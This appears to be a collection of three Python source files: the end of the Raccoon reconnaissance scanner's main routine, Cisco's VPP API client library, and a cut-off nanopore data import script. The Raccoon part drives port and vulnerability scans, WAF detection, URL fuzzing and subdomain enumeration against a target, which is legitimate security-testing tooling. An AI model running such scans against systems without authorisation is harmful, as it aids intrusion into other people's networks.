logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
# TODO: Populate array when multiple targets are supported
# hosts = []
try:
host = Host(target=target, dns_records=dns_records)
host.parse()
except HostHandlerException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(11)
if not skip_health_check:
try:
HelpUtilities.validate_target_is_up(host)
except RaccoonException as err:
logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(42)
if not skip_nmap_scan:
if vulners_nmap_scan:
logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_vulners_scan = NmapVulnersScan(host=host, port_range=port, vulners_path=vulners_path)
nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
# Run NmapVulners scan in the background
nmap_thread.start()
else:
logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_scan = NmapScan(
host=host,
port_range=port,
full_scan=full_scan,
scripts=scripts,
services=services)
nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
# Run Nmap scan in the background. Can take some time
nmap_thread.start()
if headers:
try:
headers = HelpUtilities.parse_header_arg(headers)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Run first set of checks - TLS, Web/WAF Data, DNS data
waf = WAF(host)
tls_info_scanner = TLSHandler(host, tls_port)
web_app_scanner = WebApplicationScanner(host, headers)
tasks = (
asyncio.ensure_future(tls_info_scanner.run()),
asyncio.ensure_future(waf.detect()),
# asyncio.ensure_future(DNSHandler.grab_whois(host)),
asyncio.ensure_future(web_app_scanner.run_scan()),
asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
)
main_loop.run_until_complete(asyncio.wait(tasks))
# Second set of checks - URL fuzzing, Subdomain enumeration
if not no_url_fuzzing:
fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
main_loop.run_until_complete(fuzzer.fuzz_all())
if not host.is_ip:
sans = tls_info_scanner.sni_data.get("SANs")
subdomain_enumerator = SubDomainEnumerator(
host,
domain_list=subdomain_list,
sans=sans,
ignored_response_codes=ignored_response_codes,
num_threads=threads,
follow_redirects=follow_redirects,
no_sub_enum=no_sub_enum
)
main_loop.run_until_complete(subdomain_enumerator.run())
if not skip_nmap_scan:
if nmap_thread.is_alive():
logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
"Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
while nmap_thread.is_alive():
time.sleep(15)
logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
os.system("stty sane")
except KeyboardInterrupt:
print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
# Fix F'd up terminal after CTRL+C
os.system("stty sane")
exit(42)
if __name__ == "__main__":
main()
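# --- Hedged usage sketch (not part of Raccoon) ----------------------------------
# The flags mirror the @click.option declarations above; one way to exercise the
# command programmatically is click's test runner. Invoking it would start a real
# scan against the given target, so the helper is only defined here, never called:
def _example_invocation():
    from click.testing import CliRunner
    runner = CliRunner()
    # equivalent to: raccoon example.com --full-scan --no-url-fuzzing -o scan_out
    return runner.invoke(main, ["example.com", "--full-scan", "--no-url-fuzzing", "-o", "scan_out"])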
|
vpp_papi.py
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import sys
import multiprocessing as mp
import os
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
from . vpp_serializer import VPPType, VPPEnumType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
logger = logging.getLogger(__name__)
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
__all__ = ('FuncWrapper', 'VPP', 'VppApiDynamicMethodHolder',
'VppEnum', 'VppEnumType',
'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
'VPPApiClient', )
def metaclass(metaclass):
@functools.wraps(metaclass)
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class VppEnumType(type):
def __getattr__(cls, name):
t = vpp_get_type(name)
return t.enum
@metaclass(VppEnumType)
class VppEnum(object):
pass
def vpp_atexit(vpp_weakref):
"""Clean up VPP connection on shutdown."""
vpp_instance = vpp_weakref()
if vpp_instance and vpp_instance.transport.connected:
vpp_instance.logger.debug('Cleaning up VPP on exit')
vpp_instance.disconnect()
if sys.version[0] == '2':
def vpp_iterator(d):
return d.iteritems()
else:
def vpp_iterator(d):
return d.items()
def call_logger(msgdef, kwargs):
s = 'Calling {}('.format(msgdef.name)
for k, v in kwargs.items():
s += '{}:{} '.format(k, v)
s += ')'
return s
def return_logger(r):
s = 'Return from {}'.format(r)
return s
class VppApiDynamicMethodHolder(object):
pass
class FuncWrapper(object):
def __init__(self, func):
self._func = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, **kwargs):
return self._func(**kwargs)
def __repr__(self):
return '<FuncWrapper(func=<%s(%s)>)>' % (self.__name__, self.__doc__)
class VPPApiError(Exception):
pass
class VPPNotImplementedError(NotImplementedError):
pass
class VPPIOError(IOError):
pass
class VPPRuntimeError(RuntimeError):
pass
class VPPValueError(ValueError):
pass
class VPPApiClient(object):
"""VPP interface.
This class provides the APIs to VPP. The APIs are loaded
from provided .api.json files and makes functions accordingly.
These functions are documented in the VPP .api files, as they
are dynamically created.
Additionally, VPP can send callback messages; this class
provides a means to register a callback function to receive
these messages in a background thread.
"""
apidir = None
VPPApiError = VPPApiError
VPPRuntimeError = VPPRuntimeError
VPPValueError = VPPValueError
VPPNotImplementedError = VPPNotImplementedError
VPPIOError = VPPIOError
def process_json_file(self, apidef_file):
api = json.load(apidef_file)
types = {}
for t in api['enums']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
for t in api['unions']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'union', 'data': t}
for t in api['types']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'type', 'data': t}
for t, v in api['aliases'].items():
types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
self.services.update(api['services'])
i = 0
while True:
unresolved = {}
for k, v in types.items():
t = v['data']
if not vpp_get_type(k):
if v['type'] == 'enum':
try:
VPPEnumType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'union':
try:
VPPUnionType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'type':
try:
VPPType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'alias':
try:
VPPTypeAlias(k, t)
except ValueError:
unresolved[k] = v
if len(unresolved) == 0:
break
if i > 3:
raise VPPValueError('Unresolved type definitions {}'
.format(unresolved))
types = unresolved
i += 1
for m in api['messages']:
try:
self.messages[m[0]] = VPPMessage(m[0], m[1:])
except VPPNotImplementedError:
self.logger.error('Not implemented error for {}'.format(m[0]))
def __init__(self, apifiles=None, testmode=False, async_thread=True,
logger=None, loglevel=None,
read_timeout=5, use_socket=False,
server_address='/run/vpp-api.sock'):
"""Create a VPP API object.
apifiles is a list of files containing API
descriptions that will be loaded - methods will be
dynamically created reflecting these APIs. If not
provided this will load the API files from VPP's
default install location.
logger, if supplied, is the logging logger object to log to.
loglevel, if supplied, is the log level this logger is set
to report at (from the loglevels in the logging module).
"""
if logger is None:
logger = logging.getLogger(__name__)
if loglevel is not None:
logger.setLevel(loglevel)
self.logger = logger
self.messages = {}
self.services = {}
self.id_names = []
self.id_msgdef = []
self.header = VPPType('header', [['u16', 'msgid'],
['u32', 'client_index']])
self.apifiles = []
self.event_callback = None
self.message_queue = queue.Queue()
self.read_timeout = read_timeout
self.async_thread = async_thread
self.event_thread = None
self.testmode = testmode
self.use_socket = use_socket
self.server_address = server_address
self._apifiles = apifiles
if use_socket:
from . vpp_transport_socket import VppTransport
else:
from . vpp_transport_shmem import VppTransport
if not apifiles:
# Pick up API definitions from default directory
try:
apifiles = self.find_api_files()
except RuntimeError:
# In test mode we don't care that we can't find the API files
if testmode:
apifiles = []
else:
raise VPPRuntimeError
for file in apifiles:
with open(file) as apidef_file:
self.process_json_file(apidef_file)
self.apifiles = apifiles
# Basic sanity check
if len(self.messages) == 0 and not testmode:
raise VPPValueError(1, 'Missing JSON message definitions')
self.transport = VppTransport(self, read_timeout=read_timeout,
server_address=server_address)
# Make sure we allow VPP to clean up the message rings.
atexit.register(vpp_atexit, weakref.ref(self))
class ContextId(object):
"""Multiprocessing-safe provider of unique context IDs."""
def __init__(self):
self.context = mp.Value(ctypes.c_uint, 0)
self.lock = mp.Lock()
def __call__(self):
"""Get a new unique (or, at least, not recently used) context."""
with self.lock:
self.context.value += 1
return self.context.value
get_context = ContextId()
def get_type(self, name):
return vpp_get_type(name)
@classmethod
def find_api_dir(cls):
"""Attempt to find the best directory in which API definition
        files may reside. If the class attribute 'apidir' has been set (callers
        typically fill it from the VPP_API_DIR environment variable) then it is
        first on the search list. If we're inside a recognized
location in a VPP source tree (src/scripts and src/vpp-api/python)
then entries from there to the likely locations in build-root are
added. Finally the location used by system packages is added.
:returns: A single directory name, or None if no such directory
could be found.
"""
dirs = [cls.apidir] if cls.apidir else []
# perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
# in which case, plot a course to likely places in the src tree
import __main__ as main
if hasattr(main, '__file__'):
# get the path of the calling script
localdir = os.path.dirname(os.path.realpath(main.__file__))
else:
# use cwd if there is no calling script
localdir = os.getcwd()
localdir_s = localdir.split(os.path.sep)
def dmatch(dir):
"""Match dir against right-hand components of the script dir"""
d = dir.split('/') # param 'dir' assumes a / separator
length = len(d)
return len(localdir_s) > length and localdir_s[-length:] == d
def sdir(srcdir, variant):
"""Build a path from srcdir to the staged API files of
'variant' (typically '' or '_debug')"""
# Since 'core' and 'plugin' files are staged
# in separate directories, we target the parent dir.
return os.path.sep.join((
srcdir,
'build-root',
'install-vpp%s-native' % variant,
'vpp',
'share',
'vpp',
'api',
))
srcdir = None
if dmatch('src/scripts'):
srcdir = os.path.sep.join(localdir_s[:-2])
elif dmatch('src/vpp-api/python'):
srcdir = os.path.sep.join(localdir_s[:-3])
elif dmatch('test'):
# we're apparently running tests
srcdir = os.path.sep.join(localdir_s[:-1])
if srcdir:
# we're in the source tree, try both the debug and release
# variants.
dirs.append(sdir(srcdir, '_debug'))
dirs.append(sdir(srcdir, ''))
# Test for staged copies of the scripts
# For these, since we explicitly know if we're running a debug versus
# release variant, target only the relevant directory
if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, '_debug'))
if dmatch('build-root/install-vpp-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, ''))
# finally, try the location system packages typically install into
dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))
# check the directories for existence; first one wins
for dir in dirs:
if os.path.isdir(dir):
return dir
return None
@classmethod
def find_api_files(cls, api_dir=None, patterns='*'):
"""Find API definition files from the given directory tree with the
given pattern. If no directory is given then find_api_dir() is used
to locate one. If no pattern is given then all definition files found
in the directory tree are used.
:param api_dir: A directory tree in which to locate API definition
files; subdirectories are descended into.
If this is None then find_api_dir() is called to discover it.
:param patterns: A list of patterns to use in each visited directory
when looking for files.
This can be a list/tuple object or a comma-separated string of
            patterns. Each value in the list will have leading/trailing
whitespace stripped.
The pattern specifies the first part of the filename, '.api.json'
is appended.
The results are de-duplicated, thus overlapping patterns are fine.
If this is None it defaults to '*' meaning "all API files".
:returns: A list of file paths for the API files found.
"""
if api_dir is None:
api_dir = cls.find_api_dir()
if api_dir is None:
raise VPPApiError("api_dir cannot be located")
if isinstance(patterns, list) or isinstance(patterns, tuple):
patterns = [p.strip() + '.api.json' for p in patterns]
else:
patterns = [p.strip() + '.api.json' for p in patterns.split(",")]
api_files = []
for root, dirnames, files in os.walk(api_dir):
# iterate all given patterns and de-dup the result
files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
for filename in files:
api_files.append(os.path.join(root, filename))
return api_files
@property
def api(self):
if not hasattr(self, "_api"):
raise VPPApiError("Not connected, api definitions not available")
return self._api
def make_function(self, msg, i, multipart, do_async):
if (do_async):
def f(**kwargs):
return self._call_vpp_async(i, msg, **kwargs)
else:
def f(**kwargs):
return self._call_vpp(i, msg, multipart, **kwargs)
f.__name__ = str(msg.name)
f.__doc__ = ", ".join(["%s %s" %
(msg.fieldtypes[j], k)
for j, k in enumerate(msg.fields)])
f.msg = msg
return f
def _register_functions(self, do_async=False):
self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
self._api = VppApiDynamicMethodHolder()
for name, msg in vpp_iterator(self.messages):
n = name + '_' + msg.crc[2:]
i = self.transport.get_msg_index(n.encode('utf-8'))
if i > 0:
self.id_msgdef[i] = msg
self.id_names[i] = name
# Create function for client side messages.
if name in self.services:
if 'stream' in self.services[name] and \
self.services[name]['stream']:
multipart = True
else:
multipart = False
f = self.make_function(msg, i, multipart, do_async)
setattr(self._api, name, FuncWrapper(f))
else:
self.logger.debug(
'No such message type or failed CRC checksum: %s', n)
def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
do_async):
pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None
rv = self.transport.connect(name.encode('utf-8'), pfx,
msg_handler, rx_qlen)
if rv != 0:
raise VPPIOError(2, 'Connect failed')
self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
self._register_functions(do_async=do_async)
# Initialise control ping
crc = self.messages['control_ping'].crc
self.control_ping_index = self.transport.get_msg_index(
('control_ping' + '_' + crc[2:]).encode('utf-8'))
self.control_ping_msgdef = self.messages['control_ping']
if self.async_thread:
self.event_thread = threading.Thread(
target=self.thread_msg_handler)
self.event_thread.daemon = True
self.event_thread.start()
else:
self.event_thread = None
return rv
def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
"""Attach to VPP.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
do_async - if true, messages are sent without waiting for a reply
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
msg_handler = self.transport.get_callback(do_async)
return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
do_async)
def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
"""Attach to VPP in synchronous mode. Application must poll for events.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
return self.connect_internal(name, None, chroot_prefix, rx_qlen,
do_async=False)
def disconnect(self):
"""Detach from VPP."""
rv = self.transport.disconnect()
if self.event_thread is not None:
self.message_queue.put("terminate event thread")
return rv
def msg_handler_sync(self, msg):
"""Process an incoming message from VPP in sync mode.
The message may be a reply or it may be an async notification.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
# If we have a context, then use the context to find any
# request waiting for a reply
context = 0
if hasattr(r, 'context') and r.context > 0:
context = r.context
if context == 0:
# No context -> async notification that we feed to the callback
self.message_queue.put_nowait(r)
else:
raise VPPIOError(2, 'RPC reply message received in event handler')
def has_context(self, msg):
if len(msg) < 10:
return False
header = VPPType('header_with_context', [['u16', 'msgid'],
['u32', 'client_index'],
['u32', 'context']])
(i, ci, context), size = header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if 'context' in msgobj.field_by_name and context >= 0:
return True
return False
def decode_incoming_msg(self, msg, no_type_conversion=False):
if not msg:
self.logger.warning('vpp_api.read failed')
return
(i, ci), size = self.header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if not msgobj:
raise VPPIOError(2, 'Reply message undefined')
r, size = msgobj.unpack(msg, ntc=no_type_conversion)
return r
def msg_handler_async(self, msg):
"""Process a message from VPP in async mode.
In async mode, all messages are returned to the callback.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def _control_ping(self, context):
"""Send a ping command."""
self._call_vpp_async(self.control_ping_index,
self.control_ping_msgdef,
context=context)
def validate_args(self, msg, kwargs):
d = set(kwargs.keys()) - set(msg.field_by_name.keys())
if d:
raise VPPValueError('Invalid argument {} to {}'
.format(list(d), msg.name))
def _call_vpp(self, i, msgdef, multipart, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
multipart - True if the message returns multiple
messages in return.
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The return value is the message or message array containing
the response. It will raise an IOError exception if there was
no response within the timeout window.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
kwargs['_vl_msg_id'] = i
no_type_conversion = kwargs.pop('_no_type_conversion', False)
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
pass
self.validate_args(msgdef, kwargs)
logging.debug(call_logger(msgdef, kwargs))
b = msgdef.pack(kwargs)
self.transport.suspend()
self.transport.write(b)
if multipart:
# Send a ping after the request - we use its response
# to detect that we have seen all results.
self._control_ping(context)
# Block until we get a reply.
rl = []
while (True):
msg = self.transport.read()
if not msg:
raise VPPIOError(2, 'VPP API client: read failed')
r = self.decode_incoming_msg(msg, no_type_conversion)
msgname = type(r).__name__
if context not in r or r.context == 0 or context != r.context:
# Message being queued
self.message_queue.put_nowait(r)
continue
if not multipart:
rl = r
break
if msgname == 'control_ping_reply':
break
rl.append(r)
self.transport.resume()
logger.debug(return_logger(rl))
return rl
def _call_vpp_async(self, i, msg, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
kwargs['client_index'] = 0
kwargs['_vl_msg_id'] = i
b = msg.pack(kwargs)
self.transport.write(b)
def register_event_callback(self, callback):
"""Register a callback for async messages.
This will be called for async notifications in sync mode,
and all messages in async mode. In sync mode, replies to
requests will not come here.
callback is a fn(msg_type_name, msg_type) that will be
called when a message comes in. While this function is
executing, note that (a) you are in a background thread and
may wish to use threading.Lock to protect your datastructures,
and (b) message processing from VPP will stop (so if you take
a long while about it you may provoke reply timeouts or cause
VPP to fill the RX buffer). Passing None will disable the
callback.
"""
self.event_callback = callback
def thread_msg_handler(self):
"""Python thread calling the user registered message handler.
This is to emulate the old style event callback scheme. Modern
clients should provide their own thread to poll the event
queue.
"""
while True:
r = self.message_queue.get()
if r == "terminate event thread":
break
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def __repr__(self):
return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
"logger=%s, read_timeout=%s, use_socket=%s, " \
"server_address='%s'>" % (
self._apifiles, self.testmode, self.async_thread,
self.logger, self.read_timeout, self.use_socket,
self.server_address)
# Provide the old name for backward compatibility.
VPP = VPPApiClient
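# Illustrative usage sketch (not part of the original module): connecting a
# client, issuing a synchronous call and registering an async event callback.
# The API file path, connection name and RPC below are assumptions for
# illustration; check your VPP installation for the exact values.
def _example_vpp_client_usage():
    vpp = VPPApiClient(apifiles=['/usr/share/vpp/api/core/vpe.api.json'])
    vpp.connect('example-client')          # attach to the VPP API transport
    print(vpp.api.show_version())          # synchronous call, blocks for the reply
    def on_event(msg_type_name, msg):
        # called from a background thread; guard shared state with a lock
        print('event:', msg_type_name)
    vpp.register_event_callback(on_event)  # async notifications land here
    vpp.disconnect()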
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
nanopype_import.py
|
# \SCRIPT\-------------------------------------------------------------------------
#
# CONTENTS : Snakemake nanopore data pipeline
#
# DESCRIPTION : Import raw fast5 from MinKNOW to nanopype packages
#
# RESTRICTIONS : none
#
# REQUIRES : none
#
# ---------------------------------------------------------------------------------
# Copyright (c) 2018-2020, Pay Giesselmann, Max Planck Institute for Molecular Genetics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Written by Pay Giesselmann
# ---------------------------------------------------------------------------------
# imports
import os, sys, glob, re, enum
import time, datetime
import argparse
import h5py, tarfile
import threading
import queue
from collections import deque
from multiprocessing import Process, Queue
from watchdog.events import RegexMatchingEventHandler
# simple logging
class logger():
logs = [sys.stdout]
class log_type(enum.Enum):
Error = "[ERROR]"
Warning = "[WARNING]"
Info = "[INFO]"
Debug = "[DEBUG]"
log_types = []
def init(file=None, log_types=[log_type.Error, log_type.Info]):
if file:
            if (os.path.isfile(file) and os.access(file, os.W_OK)) or os.access(os.path.abspath(os.path.dirname(file)), os.W_OK):
logger.logs.append(file)
logger.log_types = log_types
logger.log("Logger created")
if file and len(logger.logs) == 1:
logger.log("Log-file {file} is not accessible".format(file=file), logger.log_type.Error)
def log(message, type=log_type.Info):
if type in logger.log_types:
print_message = ' '.join([datetime.datetime.now().strftime("%d.%m.%Y %H:%M:%S"), str(type.value), message])
for log in logger.logs:
if isinstance(log, str):
with open(log, 'a') as fp:
print(print_message, file = fp)
else:
print(print_message, file = log)
# file system watchdog
class fs_event_handler(RegexMatchingEventHandler):
def __init__(self, base_dir, regexes=['.*'], on_create=None, on_modify=None, on_delete=None):
super().__init__(regexes=regexes, ignore_directories=True)
self.on_create = on_create if callable(on_create) else None
self.on_modify = on_modify if callable(on_modify) else None
self.on_delete = on_delete if callable(on_delete) else None
self.base_dir = base_dir
def on_created(self, event):
if self.on_create:
self.on_create(event.src_path)
def on_moved(self, event):
if self.on_create and self.base_dir in event.dest_path:
self.on_create(event.dest_path)
def on_modified(self, event):
if self.on_modify:
self.on_modify(event.src_path)
def on_deleted(self, event):
if self.on_delete:
self.on_delete(event.src_path)
# thread safe file queue
class delay_queue(object):
def __init__(self):
self.__keys = {}
self.__values = deque()
self.__lock = threading.Lock()
def __len__(self):
with self.__lock:
return len(self.__values)
def put(self, obj):
self.delay(obj, update=False)
def delay(self, obj, update=True):
with self.__lock:
if update and obj in self.__keys:
self.__values.remove(obj)
self.__keys[obj] = time.time()
self.__values.append(obj)
def delete(self, obj):
with self.__lock:
if obj in self.__keys:
self.__values.remove(obj)
del self.__keys[obj]
def pop(self, t=0):
t_now = time.time()
with self.__lock:
            while len(self.__values) and t_now - self.__keys[self.__values[0]] > t:
obj = self.__values.popleft()
del self.__keys[obj]
yield obj
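# Illustrative sketch (not part of the original script): the grace-period
# semantics of delay_queue.  Entries only become visible through pop() once
# they have been untouched for at least t seconds; delay() resets that timer.
def _example_delay_queue_usage(grace_period=2):
    q = delay_queue()
    q.put('read_0001.fast5')
    q.delay('read_0001.fast5')              # e.g. the file was modified again
    time.sleep(grace_period + 1)
    for f in q.pop(t=grace_period):         # yields entries older than the grace period
        print('ready to archive:', f)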
# watch filesystem for incoming target files, provide iterator interface on files
class fs_watchdog():
def __init__(self, src_dirs, regexes):
self.fs_queue = delay_queue()
self.src_dirs = list(src_dirs)
self.regexes = regexes
self.fs_event_handler = []
self.fs_observer = []
def start(self, recursive=True):
if len(self.fs_observer):
self.stop()
for src_dir in self.src_dirs:
self.fs_event_handler.append(fs_event_handler(src_dir,
self.regexes,
on_create=self.fs_queue.put,
on_modify=self.fs_queue.delay,
on_delete=self.fs_queue.delete))
self.fs_observer.append(Observer())
self.fs_observer[-1].schedule(self.fs_event_handler[-1], path=src_dir, recursive=recursive)
self.fs_observer[-1].start()
logger.log("Start file system observer on {target}".format(target=src_dir))
def stop(self):
logger.log("Stopping file system observer")
for obs in self.fs_observer:
obs.stop()
obs.join()
logger.log("Stopped file system observer")
def files(self, t=0):
return self.fs_queue.pop(t)
# package files to batch tar archives
class packager():
def __init__(self, src_dirs, dst_dir, recursive=True, ignore_existing=False, regexes=['.*'], batch_size=4000):
self.src_dirs = src_dirs
self.dst_dir = dst_dir
self.recursive = recursive
self.ignore_existing = ignore_existing
self.regexes = regexes
self.batch_size = batch_size
self.file_queue = Queue()
self.__packager = None
def __get_src__(self):
        pattern = '|'.join(self.regexes)
existing = []
for src_dir in self.src_dirs:
if self.recursive:
existing.extend([os.path.join(dirpath, f) for dirpath, _, files in os.walk(src_dir) for f in files if re.match(pattern, f)])
else:
existing.extend([os.path.join(src_dir, f) for f in os.listdir(src_dir) if re.match(pattern, f)])
return {os.path.basename(f):f for f in existing}
def __get_tar__(self):
tarfiles = [os.path.abspath(os.path.join(self.dst_dir, f)) for f in os.listdir(self.dst_dir) if re.match("[0-9]*.tar", f)]
return tarfiles
def __get_dst__(self):
tarfiles = self.__get_tar__()
existing = {}
for tf in tarfiles:
with tarfile.open(tf) as tar:
tar_members = tar.getmembers()
existing.update({tar_member.name:os.path.join(tf, tar_member.name) for tar_member in tar_members})
return existing
def __write_tar__(self, fname, batch):
n = 0
with tarfile.open(fname, 'w') as fp:
for f in batch:
if os.path.isfile(f):
fp.add(f, arcname=os.path.basename(f))
n += 1
return n
def start(self):
if self.__packager:
self.__packager.join()
        self.__packager = Process(target=self.__run__)
self.__packager.start()
def stop(self):
self.file_queue.put(None) # poison pill exit
self.__packager.join()
self.__packager = None
def put(self, src_file):
self.file_queue.put(os.path.abspath(src_file))
def __run__(self):
try:
# get existing src/dest files
logger.log("Inspect existing files and archives")
dst_files = self.__get_dst__()
src_files = self.__get_src__()
batch_count = max([0] + [int(os.path.basename(s)[:-4]) + 1 for s in self.__get_tar__()])
            # pick up files queued by the watchdog in the meantime
active = True
try:
f = self.file_queue.get(block=False)
while f:
src_files[os.path.basename(f)] = f
f = self.file_queue.get(block=False)
if not f: # poison pill exit on input queue
active = False
except queue.Empty as ex:
pass
except KeyboardInterrupt:
logger.log("Stop inspection on user request")
return
            # put files not yet archived onto the processing queue
processing_queue = deque()
src_keys = set(src_files.keys())
dst_keys = set(dst_files.keys())
to_archive = src_keys.difference(dst_keys)
archived = dst_keys.intersection(src_keys)
archived_only = dst_keys.difference(src_keys)
logger.log("{archived} raw files already archived".format(archived=len(archived)))
logger.log("{to_archive} raw files to be archived".format(to_archive=len(to_archive)))
if len(archived_only) > 0:
logger.log("{archived_only} files in archive but not found in source directory".format(archived_only=len(archived_only)), logger.log_type.Warning)
if not self.ignore_existing:
logger.log("Exiting with files in archive not found in source directory. Re-run with --ignore_existing to archive anyway")
return
processing_queue.extend(sorted([src_files[f] for f in to_archive]))
# enter main archive loop
while active:
# get file names from queue
try:
try:
f = self.file_queue.get(block=False)
while f:
processing_queue.append(f)
f = self.file_queue.get(block=False)
if f is None: # poison pill exit
active = False
except queue.Empty as ex:
pass
# archive files in batches
while len(processing_queue) >= self.batch_size:
batch = [processing_queue.popleft() for i in range(self.batch_size)]
batch_name = os.path.join(self.dst_dir, str(batch_count) + '.tar')
try:
n = self.__write_tar__(batch_name, batch)
except KeyboardInterrupt:
logger.log("Archiving of {archive} interrupted. The file is likely damaged".format(archive=batch_name))
raise
batch_count += 1
logger.log("Archived {count} reads in {archive}".format(count=n, archive=batch_name))
except KeyboardInterrupt:
# leave controlled shutdown to master process
break
# archive remaining reads
while len(processing_queue) > 0:
batch = [processing_queue.popleft() for i in range(min(len(processing_queue), self.batch_size))]
batch_name = os.path.join(self.dst_dir, str(batch_count) + '.tar')
if len(batch) > 0:
n = self.__write_tar__(batch_name, batch)
logger.log("Archived {count} reads in {archive}".format(count=n, archive=batch_name))
batch_count += 1
except KeyboardInterrupt:
logger.log("Archive worker shutdown on user request")
return
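# Illustrative sketch (not part of the original script): programmatic use of
# the packager without the file system watchdog.  The directories below are
# placeholder assumptions.
def _example_packager_usage():
    pkgr = packager(['/data/minknow/run1'], '/data/nanopype/run1/reads',
                    recursive=True, regexes=[r'.*\.fast5'], batch_size=4000)
    pkgr.start()                                      # archive existing files in a worker process
    pkgr.put('/data/minknow/run1/late_read.fast5')    # queue one more file for archiving
    pkgr.stop()                                       # flush remaining reads and join the worker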
if __name__ == '__main__':
# cmd arguments
parser = argparse.ArgumentParser(description="Nanopype raw data import script",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
